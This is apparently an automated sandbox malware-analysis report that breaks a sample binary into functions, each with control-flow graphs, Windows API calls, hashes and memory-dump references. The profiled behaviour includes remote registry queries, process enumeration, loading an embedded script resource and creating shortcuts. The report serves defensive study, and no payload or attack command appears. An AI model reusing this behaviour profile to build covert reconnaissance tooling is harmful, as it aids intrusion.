                                                                                                                                control_flow_graph 1173 f129c2-f129e2 1175 f12a42-f12a44 1173->1175 1176 f129e4-f129e7 1173->1176 1175->1176 1179 f12a46 1175->1179 1177 f129e9-f129f0 1176->1177 1178 f12a48 1176->1178 1183 f129f6-f129fb 1177->1183 1184 f12aac-f12ab4 PostQuitMessage 1177->1184 1181 f82307-f82335 call f1322e call f2ec33 1178->1181 1182 f12a4e-f12a51 1178->1182 1180 f12a2b-f12a33 NtdllDefWindowProc_W 1179->1180 1191 f12a39-f12a3f 1180->1191 1220 f8233a-f82341 1181->1220 1185 f12a53-f12a54 1182->1185 1186 f12a76-f12a9d SetTimer RegisterClipboardFormatW 1182->1186 1188 f12a01-f12a03 1183->1188 1189 f8238f-f823a3 call f557fb 1183->1189 1190 f12a72-f12a74 1184->1190 1192 f822aa-f822ad 1185->1192 1193 f12a5a-f12a6d KillTimer call f12b94 call f12ac7 1185->1193 1186->1190 1195 f12a9f-f12aaa CreatePopupMenu 1186->1195 1196 f12ab6-f12ac0 call f11e58 1188->1196 1197 f12a09-f12a0e 1188->1197 1189->1190 1214 f823a9 1189->1214 1190->1191 1205 f822af-f822b1 1192->1205 1206 f822e3-f82302 MoveWindow 1192->1206 1193->1190 1195->1190 1215 f12ac5 1196->1215 1201 f12a14-f12a19 1197->1201 1202 f82374-f8237b 1197->1202 1212 f8235f-f8236f call f55fdb 1201->1212 1213 f12a1f-f12a25 1201->1213 1202->1180 1210 f82381-f8238a call f4b31f 1202->1210 1207 f822d2-f822de SetFocus 1205->1207 1208 f822b3-f822b6 1205->1208 1206->1190 1207->1190 1208->1213 1216 f822bc-f822cd call f1322e 1208->1216 1210->1180 1212->1190 1213->1180 1213->1220 1214->1180 1215->1190 1216->1190 1220->1180 1224 f82347-f8235a call f12b94 call f13598 1220->1224 1224->1180
                                                                                                                                APIs
                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00F12A33
                                                                                                                                • KillTimer.USER32(?,00000001), ref: 00F12A5D
                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F12A80
                                                                                                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F12A8B
                                                                                                                                • CreatePopupMenu.USER32 ref: 00F12A9F
                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00F12AAE
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                • API String ID: 157504867-2362178303
                                                                                                                                • Opcode ID: 42724bdc852408926b2469632a06bb7615b59a6b897b4df3de870b08c336a4ae
                                                                                                                                • Instruction ID: 7649bf992561a215381a0c6221d8bf2fae5e3ba9f4316e83e37647ad9a37105e
                                                                                                                                • Opcode Fuzzy Hash: 42724bdc852408926b2469632a06bb7615b59a6b897b4df3de870b08c336a4ae
                                                                                                                                • Instruction Fuzzy Hash: 3541D332604249ABDBA5AFF8AC09BF93756FF14350F14021AF50292192DA6D98E0B761
                                                                                                                                Function 00F730AD Relevance: 12.4, APIs: 8, Instructions: 397registryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1667 f730ad-f7315b call f1ca8e call f1d3d2 * 3 call f184a6 call f73d7b call f73af7 1682 f73166-f73170 1667->1682 1683 f7315d-f73161 1667->1683 1685 f731a2 1682->1685 1686 f73172-f73187 RegConnectRegistryW 1682->1686 1684 f731e6-f731f2 call f5d7e4 1683->1684 1696 f73504-f73527 call f15cd3 * 3 1684->1696 1687 f731a6-f731c3 RegOpenKeyExW 1685->1687 1689 f7319c-f731a0 1686->1689 1690 f73189-f7319a call f17ba9 1686->1690 1691 f731f7-f73227 call f184a6 RegQueryValueExW 1687->1691 1692 f731c5-f731d7 call f17ba9 1687->1692 1689->1687 1690->1684 1705 f7323e-f73254 call f17ba9 1691->1705 1706 f73229-f73239 call f17ba9 1691->1706 1702 f731e3-f731e4 1692->1702 1703 f731d9 1692->1703 1702->1684 1703->1702 1714 f734dc-f734dd 1705->1714 1715 f7325a-f7325f 1705->1715 1713 f734df-f734e6 call f5d7e4 1706->1713 1721 f734eb-f734fc 1713->1721 1714->1713 1718 f73265-f73268 1715->1718 1719 f7344c-f73498 call f3010a call f184a6 RegQueryValueExW 1715->1719 1722 f7326e-f73273 1718->1722 1723 f733d9-f73411 call f5ad14 call f184a6 RegQueryValueExW 1718->1723 1743 f734b4-f734ce call f17ba9 call f5d7e4 1719->1743 1744 f7349a-f734a6 1719->1744 1721->1696 1737 f734fe 1721->1737 1727 f7338d-f733d4 call f184a6 RegQueryValueExW call f22570 1722->1727 1728 f73279-f7327c 1722->1728 1723->1721 1750 f73417-f73447 call f17ba9 call f5d7e4 call f22570 1723->1750 1727->1721 1732 f732de-f7332b call f3010a call f184a6 RegQueryValueExW 1728->1732 1733 f7327e-f73281 1728->1733 1732->1743 1758 f73331-f73348 1732->1758 1733->1714 1739 f73287-f732d9 call f184a6 RegQueryValueExW call f22570 1733->1739 1737->1696 1739->1721 1764 f734d3-f734da call f3017e 1743->1764 1749 f734aa-f734b2 call f1ca8e 1744->1749 1749->1764 1750->1721 1758->1749 1763 f7334e-f73355 1758->1763 1766 f73357-f73358 1763->1766 1767 f7335c-f73361 1763->1767 1764->1721 1766->1767 1770 f73376-f7337b 1767->1770 1771 f73363-f73367 1767->1771 1770->1749 1776 f73381-f73388 1770->1776 1774 f73371-f73374 1771->1774 1775 f73369-f7336d 1771->1775 1774->1770 1774->1771 1775->1774 1776->1749
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F73AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F72AA6,?,?), ref: 00F73B0E
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F7317F
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00F7321E
                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F732B6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: QueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 658460102-0
                                                                                                                                • Opcode ID: 235e97c6806b0fefc71f76f6b6d5820f9876563c27110f809fbe1d88d2919ced
                                                                                                                                • Instruction ID: c60ec42960091d03d44b6c7be531a802be1ba15df61bfc37ae89101e3aaa7d92
                                                                                                                                • Opcode Fuzzy Hash: 235e97c6806b0fefc71f76f6b6d5820f9876563c27110f809fbe1d88d2919ced
                                                                                                                                • Instruction Fuzzy Hash: C5E16A35604210AFCB14DF24CC91E6ABBE8EF88320F04856EF54ADB261DB35ED45EB52
                                                                                                                                Function 00F2E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00F2E4A7
                                                                                                                                  • Part of subcall function 00F17E53: _memmove.LIBCMT ref: 00F17EB9
                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00FADC28,?,?), ref: 00F2E567
                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,00FADC28,?,?), ref: 00F2E5BC
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F2E5C7
                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F2E5DA
                                                                                                                                • GetSystemInfo.KERNEL32(?,00FADC28,?,?), ref: 00F2E5E4
                                                                                                                                • GetSystemInfo.KERNEL32(?,00FADC28,?,?), ref: 00F2E5F0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2717633055-0
                                                                                                                                • Opcode ID: 626e0b68b44eae4c1068a846fc8d84f1621b9d736cb72f45a2228d837aca5fa7
                                                                                                                                • Instruction ID: 49d635d08681a1613c6c3b35520f50f679022c254b558ac088af875717c6a6f3
                                                                                                                                • Opcode Fuzzy Hash: 626e0b68b44eae4c1068a846fc8d84f1621b9d736cb72f45a2228d837aca5fa7
                                                                                                                                • Instruction Fuzzy Hash: F861E2B281A394CFCF15DF68A8C11E97FB46F2A304F2C45D9D8449B207D634C948EB65
                                                                                                                                Function 00F131F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F13202
                                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00F13219
                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00F857D7
                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00F857EC
                                                                                                                                • LockResource.KERNEL32(?), ref: 00F857FF
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                • String ID: SCRIPT
                                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                                • Opcode ID: dd2c2dafa445cc1a3df3d100a050442b0fac79ff7eb75f633e5f4b119aaaa737
                                                                                                                                • Instruction ID: 43c4441260b4a56900ae3e18ed1bab73bbaaeeb9e00d94e3b2d408f415c68c2b
                                                                                                                                • Opcode Fuzzy Hash: dd2c2dafa445cc1a3df3d100a050442b0fac79ff7eb75f633e5f4b119aaaa737
                                                                                                                                • Instruction Fuzzy Hash: 25117971600705BFE721AB65EC48FA77BB9EBC9B51F20812DB50286290DB71DD00AA60
                                                                                                                                Function 00F56F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F56F7D
                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F56F8D
                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F56FAC
                                                                                                                                • __wsplitpath.LIBCMT ref: 00F56FD0
                                                                                                                                • _wcscat.LIBCMT ref: 00F56FE3
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00F57022
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1605983538-0
                                                                                                                                • Opcode ID: cf6843bb7628eda55548728cf10441ad3b769268ceb0f22c1f354ae45b8fa843
                                                                                                                                • Instruction ID: 51954f41da901d8b651e4b4577f46f6f5edb2549c49863bfda414e6f85a8524a
                                                                                                                                • Opcode Fuzzy Hash: cf6843bb7628eda55548728cf10441ad3b769268ceb0f22c1f354ae45b8fa843
                                                                                                                                • Instruction Fuzzy Hash: DE218772904218ABDB11ABA4DC88FEEB7FCAB48311F5004E5FA05D3141E7759F85EB60
                                                                                                                                Function 00F5EFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F578AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00F578CB
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00F5F04D
                                                                                                                                • CoCreateInstance.COMBASE(00F9DA7C,00000000,00000001,00F9D8EC,?), ref: 00F5F066
                                                                                                                                • CoUninitialize.COMBASE ref: 00F5F083
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                                • String ID: .lnk
                                                                                                                                • API String ID: 2126378814-24824748
                                                                                                                                • Opcode ID: 0899f1ee243af91fde57fee6b30771ff1085b681dfb4d1cdd2b70866df72e5ee
                                                                                                                                • Instruction ID: 5ab240ebb6c9c76e99faabfc17d21d22ae565b9b8b4a7997dd610aae90814dec
                                                                                                                                • Opcode Fuzzy Hash: 0899f1ee243af91fde57fee6b30771ff1085b681dfb4d1cdd2b70866df72e5ee
                                                                                                                                • Instruction Fuzzy Hash: 01A16875A043019FCB10DF14C884D5ABBE5FF88321F148998F99A9B3A2CB35ED49DB91
                                                                                                                                Function 00F22B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F3010A: std::exception::exception.LIBCMT ref: 00F3013E
                                                                                                                                  • Part of subcall function 00F3010A: __CxxThrowException@8.LIBCMT ref: 00F30153
                                                                                                                                • _memmove.LIBCMT ref: 00F22C63
                                                                                                                                • _memmove.LIBCMT ref: 00F2303A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                • String ID: @
                                                                                                                                • API String ID: 1300846289-2766056989
                                                                                                                                • Opcode ID: f99eeff5eb3fc3959e43b6377459314778a6f7aca664df13ff1576df2f2b1c69
                                                                                                                                • Instruction ID: 9234907268078011035aa0fe161427edbe664713d9c91b38fe1068a66b98399d
                                                                                                                                • Opcode Fuzzy Hash: f99eeff5eb3fc3959e43b6377459314778a6f7aca664df13ff1576df2f2b1c69
                                                                                                                                • Instruction Fuzzy Hash: 7BC27C75E00215DFCB14EF54D891BADB7B1BF48310F24805AE906AB351DB38EE86EB91
                                                                                                                                Function 00F2DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNEL32(00F1C848,00F1C848), ref: 00F2DDA2
                                                                                                                                • FindFirstFileW.KERNEL32(00F1C848,?), ref: 00F84A83
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4185537391-0
                                                                                                                                • Opcode ID: 17918ea613b2e988234d5bc95cfe1c730d6a08e3be31b0816ac21bbca397ad8d
                                                                                                                                • Instruction ID: 32e41fa2c56f269ffc979fc9e6af84165d8036c9eecfbacc5d6f069ab8865ff7
                                                                                                                                • Opcode Fuzzy Hash: 17918ea613b2e988234d5bc95cfe1c730d6a08e3be31b0816ac21bbca397ad8d
                                                                                                                                • Instruction Fuzzy Hash: F7E0D8338158155752146B3CEC0D8E9775C9B05338B600706F875C20F0EB74AD80A6DA
                                                                                                                                Function 00F1DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 377c9d40de0cafa1afe315fd80d59935b791bef140ef9e3743d70ecbdac341a2
                                                                                                                                • Instruction ID: 4a8020df7bc1c381c27873af2820b480c8bfef6a20e9f0d1417c534f8a1a403d
                                                                                                                                • Opcode Fuzzy Hash: 377c9d40de0cafa1afe315fd80d59935b791bef140ef9e3743d70ecbdac341a2
                                                                                                                                • Instruction Fuzzy Hash: 8B22CD71D00205DFDB24DF58C890BEAB7F1FF19320F148069E856AB391E774A986EB91
                                                                                                                                Function 00F23680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3964851224-0
                                                                                                                                • Opcode ID: 8b0ae1b85f8c76a3990b12f9c31da351c1664139fdf04ce1b465205409ffb2d7
                                                                                                                                • Instruction ID: 2c3b0d429dd0253ffa429f0edae4109ea15626005610ce04e6682c14a89a4970
                                                                                                                                • Opcode Fuzzy Hash: 8b0ae1b85f8c76a3990b12f9c31da351c1664139fdf04ce1b465205409ffb2d7
                                                                                                                                • Instruction Fuzzy Hash: 0F929CB0A083518FD724DF18D480B6AB7F1FF88314F14885DE98A8B252D779ED85EB52
                                                                                                                                Function 00F8C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: NameUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                • Opcode ID: b9fd6043a714e5ba32ea760b2493be5bcec7577515d7d1d200698b751cc8b9ef
                                                                                                                                • Instruction ID: a6d9de46b7579db2eb05a8ae2313d1d8a05049ade2a6b4b648de39fc078dba62
                                                                                                                                • Opcode Fuzzy Hash: b9fd6043a714e5ba32ea760b2493be5bcec7577515d7d1d200698b751cc8b9ef
